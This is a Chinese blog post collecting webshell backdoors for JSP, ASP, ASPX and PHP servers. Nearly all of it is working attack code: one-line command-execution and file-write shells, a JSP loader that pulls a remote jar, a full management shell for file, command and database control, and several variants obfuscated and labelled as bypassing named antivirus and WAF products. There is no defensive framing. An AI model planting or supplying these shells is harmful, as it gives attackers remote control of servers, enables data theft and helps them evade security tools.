后门木马整理

2019/07/12 15:41
阅读数 144

JSP:

无回显(http://192.168.16.240:8080/Shell/cmd2.jsp?i=ls)

<%Runtime.getRuntime().exec(request.getParameter("i"));%>

有回显 (http://192.168.16.240:8080/Shell/cmd2.jsp?pwd=023&i=ls)

1 <% if("023".equals(request.getParameter("pwd"))){ java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("
2 <pre>");
3         while((a=in.read(b))!=-1){
4             out.println(new String(b,0,a));
5         }
6         out.print("</pre>
7 ");
8     }
9 %>
View Code

客户端写入:

http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

1 <%new java.io.FileOutputStream(request.getParameter("f")).write(request.getParameter("c").getBytes());%>
View Code

http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234

1 <%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(request.getParameter("c").getBytes());%>
View Code

http://localhost:8080/Shell/file.jsp?f=/Users/yz/wwwroot/2.txt&c=1234

1 <%new java.io.RandomAccessFile(request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
View Code

http://localhost:8080/Shell/file.jsp?f=2.txt&c=1234 

1 <%new java.io.RandomAccessFile(application.getRealPath("/")+"/"+request.getParameter("f"),"rw").write(request.getParameter("c").getBytes()); %>
View Code

反射调用外部jar:

http://192.168.16.240:8080/Shell/reflect.jsp?u=http://javaweb.org/Cat.jar&023=A 

1 <%=Class.forName("Load",true,new java.net.URLClassLoader(new java.net.URL[]{new java.net.URL(request.getParameter("u"))})).getMethods()[0].invoke(null, new Object[]{request.getParameterMap()})%>
View Code

 

常规:

1 <%
2 if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
3 %>
View Code
  1 <%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>
  2 <%!String Pwd = "pass";
  3 
  4     String EC(String s, String c) throws Exception {
  5         return s;
  6     }//new String(s.getBytes("ISO-8859-1"),c);}
  7 
  8     Connection GC(String s) throws Exception {
  9         String[] x = s.trim().split("\r\n");
 10         Class.forName(x[0].trim()).newInstance();
 11         Connection c = DriverManager.getConnection(x[1].trim());
 12         if (x.length > 2) {
 13             c.setCatalog(x[2].trim());
 14         }
 15         return c;
 16     }
 17 
 18     void AA(StringBuffer sb) throws Exception {
 19         File r[] = File.listRoots();
 20         for (int i = 0; i < r.length; i++) {
 21             sb.append(r[i].toString().substring(0, 2));
 22         }
 23     }
 24 
 25     void BB(String s, StringBuffer sb) throws Exception {
 26         File oF = new File(s), l[] = oF.listFiles();
 27         String sT, sQ, sF = "";
 28         java.util.Date dt;
 29         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
 30         for (int i = 0; i < l.length; i++) {
 31             dt = new java.util.Date(l[i].lastModified());
 32             sT = fm.format(dt);
 33             sQ = l[i].canRead() ? "R" : "";
 34             sQ += l[i].canWrite() ? " W" : "";
 35             if (l[i].isDirectory()) {
 36                 sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()
 37                         + "\t" + sQ + "\n");
 38             } else {
 39                 sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"
 40                         + sQ + "\n";
 41             }
 42         }
 43         sb.append(sF);
 44     }
 45 
 46     void EE(String s) throws Exception {
 47         File f = new File(s);
 48         if (f.isDirectory()) {
 49             File x[] = f.listFiles();
 50             for (int k = 0; k < x.length; k++) {
 51                 if (!x[k].delete()) {
 52                     EE(x[k].getPath());
 53                 }
 54             }
 55         }
 56         f.delete();
 57     }
 58 
 59     void FF(String s, HttpServletResponse r) throws Exception {
 60         int n;
 61         byte[] b = new byte[512];
 62         r.reset();
 63         ServletOutputStream os = r.getOutputStream();
 64         BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));
 65         os.write(("->" + "|").getBytes(), 0, 3);
 66         while ((n = is.read(b, 0, 512)) != -1) {
 67             os.write(b, 0, n);
 68         }
 69         os.write(("|" + "<-").getBytes(), 0, 3);
 70         os.close();
 71         is.close();
 72     }
 73 
 74     void GG(String s, String d) throws Exception {
 75         String h = "0123456789ABCDEF";
 76         int n;
 77         File f = new File(s);
 78         f.createNewFile();
 79         FileOutputStream os = new FileOutputStream(f);
 80         for (int i = 0; i < d.length(); i += 2) {
 81             os
 82                     .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d
 83                             .charAt(i + 1))));
 84         }
 85         os.close();
 86     }
 87 
 88     void HH(String s, String d) throws Exception {
 89         File sf = new File(s), df = new File(d);
 90         if (sf.isDirectory()) {
 91             if (!df.exists()) {
 92                 df.mkdir();
 93             }
 94             File z[] = sf.listFiles();
 95             for (int j = 0; j < z.length; j++) {
 96                 HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());
 97             }
 98         } else {
 99             FileInputStream is = new FileInputStream(sf);
100             FileOutputStream os = new FileOutputStream(df);
101             int n;
102             byte[] b = new byte[512];
103             while ((n = is.read(b, 0, 512)) != -1) {
104                 os.write(b, 0, n);
105             }
106             is.close();
107             os.close();
108         }
109     }
110 
111     void II(String s, String d) throws Exception {
112         File sf = new File(s), df = new File(d);
113         sf.renameTo(df);
114     }
115 
116     void JJ(String s) throws Exception {
117         File f = new File(s);
118         f.mkdir();
119     }
120 
121     void KK(String s, String t) throws Exception {
122         File f = new File(s);
123         SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");
124         java.util.Date dt = fm.parse(t);
125         f.setLastModified(dt.getTime());
126     }
127 
128     void LL(String s, String d) throws Exception {
129         URL u = new URL(s);
130         int n;
131         FileOutputStream os = new FileOutputStream(d);
132         HttpURLConnection h = (HttpURLConnection) u.openConnection();
133         InputStream is = h.getInputStream();
134         byte[] b = new byte[512];
135         while ((n = is.read(b, 0, 512)) != -1) {
136             os.write(b, 0, n);
137         }
138         os.close();
139         is.close();
140         h.disconnect();
141     }
142 
143     void MM(InputStream is, StringBuffer sb) throws Exception {
144         String l;
145         BufferedReader br = new BufferedReader(new InputStreamReader(is));
146         while ((l = br.readLine()) != null) {
147             sb.append(l + "\r\n");
148         }
149     }
150 
151     void NN(String s, StringBuffer sb) throws Exception {
152         Connection c = GC(s);
153         ResultSet r = c.getMetaData().getCatalogs();
154         while (r.next()) {
155             sb.append(r.getString(1) + "\t");
156         }
157         r.close();
158         c.close();
159     }
160 
161     void OO(String s, StringBuffer sb) throws Exception {
162         Connection c = GC(s);
163         String[] t = { "TABLE" };
164         ResultSet r = c.getMetaData().getTables(null, null, "%", t);
165         while (r.next()) {
166             sb.append(r.getString("TABLE_NAME") + "\t");
167         }
168         r.close();
169         c.close();
170     }
171 
172     void PP(String s, StringBuffer sb) throws Exception {
173         String[] x = s.trim().split("\r\n");
174         Connection c = GC(s);
175         Statement m = c.createStatement(1005, 1007);
176         ResultSet r = m.executeQuery("select * from " + x[3]);
177         ResultSetMetaData d = r.getMetaData();
178         for (int i = 1; i <= d.getColumnCount(); i++) {
179             sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)
180                     + ")\t");
181         }
182         r.close();
183         m.close();
184         c.close();
185     }
186 
187     void QQ(String cs, String s, String q, StringBuffer sb) throws Exception {
188         int i;
189         Connection c = GC(s);
190         Statement m = c.createStatement(1005, 1008);
191         try {
192             ResultSet r = m.executeQuery(q);
193             ResultSetMetaData d = r.getMetaData();
194             int n = d.getColumnCount();
195             for (i = 1; i <= n; i++) {
196                 sb.append(d.getColumnName(i) + "\t|\t");
197             }
198             sb.append("\r\n");
199             while (r.next()) {
200                 for (i = 1; i <= n; i++) {
201                     sb.append(EC(r.getString(i), cs) + "\t|\t");
202                 }
203                 sb.append("\r\n");
204             }
205             r.close();
206         } catch (Exception e) {
207             sb.append("Result\t|\t\r\n");
208             try {
209                 m.executeUpdate(q);
210                 sb.append("Execute Successfully!\t|\t\r\n");
211             } catch (Exception ee) {
212                 sb.append(ee.toString() + "\t|\t\r\n");
213             }
214         }
215         m.close();
216         c.close();
217     }%>
218      
219      
220 <%
221     String cs = request.getParameter("z0")==null?"gbk": request.getParameter("z0") + "";
222     request.setCharacterEncoding(cs);
223     response.setContentType("text/html;charset=" + cs);
224     String Z = EC(request.getParameter(Pwd) + "", cs);
225     String z1 = EC(request.getParameter("z1") + "", cs);
226     String z2 = EC(request.getParameter("z2") + "", cs);
227     StringBuffer sb = new StringBuffer("");
228     try {
229         sb.append("->" + "|");
230         if (Z.equals("A")) {
231             String s = new File(application.getRealPath(request
232                     .getRequestURI())).getParent();
233             sb.append(s + "\t");
234             if (!s.substring(0, 1).equals("/")) {
235                 AA(sb);
236             }
237         } else if (Z.equals("B")) {
238             BB(z1, sb);
239         } else if (Z.equals("C")) {
240             String l = "";
241             BufferedReader br = new BufferedReader(
242                     new InputStreamReader(new FileInputStream(new File(
243                             z1))));
244             while ((l = br.readLine()) != null) {
245                 sb.append(l + "\r\n");
246             }
247             br.close();
248         } else if (Z.equals("D")) {
249             BufferedWriter bw = new BufferedWriter(
250                     new OutputStreamWriter(new FileOutputStream(
251                             new File(z1))));
252             bw.write(z2);
253             bw.close();
254             sb.append("1");
255         } else if (Z.equals("E")) {
256             EE(z1);
257             sb.append("1");
258         } else if (Z.equals("F")) {
259             FF(z1, response);
260         } else if (Z.equals("G")) {
261             GG(z1, z2);
262             sb.append("1");
263         } else if (Z.equals("H")) {
264             HH(z1, z2);
265             sb.append("1");
266         } else if (Z.equals("I")) {
267             II(z1, z2);
268             sb.append("1");
269         } else if (Z.equals("J")) {
270             JJ(z1);
271             sb.append("1");
272         } else if (Z.equals("K")) {
273             KK(z1, z2);
274             sb.append("1");
275         } else if (Z.equals("L")) {
276             LL(z1, z2);
277             sb.append("1");
278         } else if (Z.equals("M")) {
279             String[] c = { z1.substring(2), z1.substring(0, 2), z2 };
280             Process p = Runtime.getRuntime().exec(c);
281             MM(p.getInputStream(), sb);
282             MM(p.getErrorStream(), sb);
283         } else if (Z.equals("N")) {
284             NN(z1, sb);
285         } else if (Z.equals("O")) {
286             OO(z1, sb);
287         } else if (Z.equals("P")) {
288             PP(z1, sb);
289         } else if (Z.equals("Q")) {
290             QQ(cs, z1, z2, sb);
291         }
292     } catch (Exception e) {
293         sb.append("ERROR" + ":// " + e.toString());
294     }
295     sb.append("|" + "<-");
296     out.print(sb.toString());
297 %>
View Code

 JSP后门连接:

1 <html><head><title>JSP一句话木马客户端</title></head><div align=center>  <font color=red>专用JSP木马连接器</font><br><form name=get method=post>服务端地址<input name=url size=110 type=text>  <br><br><textarea name=t rows=20 cols=120>你提交的代码</textarea><br>保存成的文件名:<input name=f size=30 value=shell.jsp><input type=button onclick="javascript:get.action=document.get.url.value;get.submit()" value=提交> </form>  <br>服务端代码:<br><textarea rows=5 cols=120><%if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>   </textarea>  </div></body>
View Code

 下载远程文件:

http://localhost:8080/Shell/download.jsp?f=/Users/yz/wwwroot/1.png&u=http://www.baidu.com/img/bdlogo.png

1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(request.getParameter("f")).write(baos.toByteArray()); %>
View Code

下载web路径:

http://localhost:8080/Shell/download.jsp?f=1.png&u=http://www.baidu.com/img/bdlogo.png

1 <% java.io.InputStream in = new java.net.URL(request.getParameter("u")).openStream(); byte[] b = new byte[1024]; java.io.ByteArrayOutputStream baos = new java.io.ByteArrayOutputStream(); int a = -1; while ((a = in.read(b)) != -1) { baos.write(b, 0, a); } new java.io.FileOutputStream(application.getRealPath("/")+"/"+ request.getParameter("f")).write(baos.toByteArray()); %>
View Code

 

ASP:

<%eval request("chopper")%>

常规:

 1 <%execute request("chopper")%>
 2 
 3 <%execute(request("chopper"))%>
 4 
 5 <%ExecuteGlobal request("chopper")%>
 6 
 7 <%Eval(Request(chr(35)))%>
 8 
 9 <%dy=request("c")%><%Eval(dy)%> 
10 
11 <%if request ("c")<>""then session("c")=request("c"):end if:if session("c")<>"" then execute session("c")%> 
12 
13 <% if Request("c")<>"" then ExecuteGlobal request("c") end if %>
14 
15 <%execute request("c")%><%'<% loop <%:%>
16 
17 < %'<% loop <%:%><%execute request("a")%>
18 
19 <script language=vbs runat=server>eval(request("c"))</script> 
20 
21 <script language=VBScript runat=server>execute request("#")</script> 
22 
23 <%eval(eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("c"))%>
24 
25 <%eval""&("e"&"v"&"a"&"l"&"("&"r"&"e"&"q"&"u"&"e"&"s"&"t"&"("&"0"&"-"&"2"&"-"&"5"&")"&")")%>
26 
27 <%execute(unescape("eval%20request%28%22aaa%22%29"))%>
View Code
UTF-7编码加密:
1 <%@ codepage=65000%><% response.Charset=”936″%><%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>
View Code
 
Script Encoder 加密  //密码c
1 <%@ LANGUAGE = VBScript.Encode %>
2 <%#@~^PgAAAA==~b0~"+$E+kYvEmr#@!@*rJ~O4+x,36 mEDn!VK4mV~Dn5!+dYvEmr#~n NPrW,SBMAAA==^#~@%>
View Code

过雷客图:

 1 <%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
 2 ms.Language="VBScript"
 3 ms.AddObject "Response", Response
 4 ms.AddObject "request", request
 5 ms.AddObject "session", session
 6 ms.AddObject "server", server
 7 ms.AddObject "application", application
 8 ms.ExecuteStatement ("ex"&"e"&"cute(request(chr(35)))")%>
 9 
10 <%
11 password=Request("class")
12 Execute(AACode("457865637574652870617373776F726429")):Function AACode(byVal s):For i=1 To Len(s) Step 2:c=Mid(s,i,2):If IsNumeric(Mid(s,i,1)) Then:Execute("AACode=AACode&chr(&H"&c&")"):Else:Execute("AACode=AACode&chr(&H"&c&Mid(s,i+2,2)&")"):i=i+2:End If:Next:End Function
13 %>
14 
15 
16 <%
17 password=Request("class")
18 Execute(DeAsc("%87%138%119%117%135%134%119%58%130%115%133%133%137%129%132%118%59")):Function DeAsc(Str):Str=Split(Str,"%"):For I=1 To Ubound(Str):DeAsc=DeAsc&Chr(Str(I)-18):Next:End Function
19 %>
View Code

 

ASPX:

常规免杀

1 <%@ Page Language="Jscript"%>
2 <%
3 var a = Request.Item["M"];
4 var b = "un" + Char ( 115 ) + Char ( 97 ) + "fe";//主要就是这个地方 其他地方好像不会管
5 eval(a,b);
6 Response.Write("Test");
7 %>
View Code

绕过安全狗

 1 <%
 2 dim play
 3 '
 4 '
 5 ''''''''''''''''''
 6 '''''''''
 7 play = request("#")
 8 %>
 9 Error
10 <%
11 execute(play)
12 %>
View Code
1 <%@codepage=65000%>
2 <%r+k-es+k-p+k-on+k-se.co+k-d+k-e+k-p+k-age=936:e+k-v+k-a+k-l r+k-e+k-q+k-u+k-e+k-s+k-t("#")%>
View Code

过D盾:

 1 <%@ Page Language="Jscript" Debug=true%>
 2 <%
 3 var a=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("UmVxdWVzdC5Gb3JtWyJwYXNzIl0="));
 4 var b=System.Text.Encoding.GetEncoding(65001).GetString(System.Convert.FromBase64String("dW5zYWZl"));
 5 var c=eval(a,b);
 6 eval(c,b);
 7 
 8 %>
 9 
10  
11 
12 <%@ Page Language="Jscript" Debug=true%>
13 <%
14 var a=Request.Form["pass"];
15 var b="unsa",c="fe",d=b+c;
16 function fun()
17 {
18 return a;
19 }
20 eval(fun(),d);
21 %>
View Code

 

PHP:

常规:

1 <?php
2 system($_GET['cmd']);
3 ?>
View Code

过D盾:

1 <?php
2 $ab = $_REQUEST['d'];
3 $a['t'] = "";
4 eval($a['t'].$ab);
View Code

过安全狗

1 <?php
2 $a = $_REQUEST['d'];
3 $a = "$a";
4 $b['test'] = "";
5 eval($b['test']."$a");
View Code

 

展开阅读全文
打赏
0
0 收藏
分享
加载中
更多评论
打赏
0 评论
0 收藏
0
分享
返回顶部
顶部